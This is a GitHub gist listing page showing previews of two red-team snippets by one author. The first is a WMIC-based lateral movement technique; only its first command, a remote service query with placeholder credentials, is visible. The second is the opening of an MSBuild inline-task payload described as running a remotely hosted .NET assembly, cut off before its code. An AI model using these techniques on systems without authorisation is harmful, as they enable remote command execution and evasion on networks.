Skip to content

Instantly share code, notes, and snippets.

@G0ldenGunSec
G0ldenGunSec / wmicLateralMovement.txt
Created Dec 11, 2019
WMIC Service Modification for Lateral Movement
View wmicLateralMovement.txt
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
@G0ldenGunSec
G0ldenGunSec / msBuildDemo.xml
Last active Feb 25, 2020
MSBuild payload used to execute a remotely-hosted .net assembly
View msBuildDemo.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="DemoClass">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
You can’t perform that action at this time.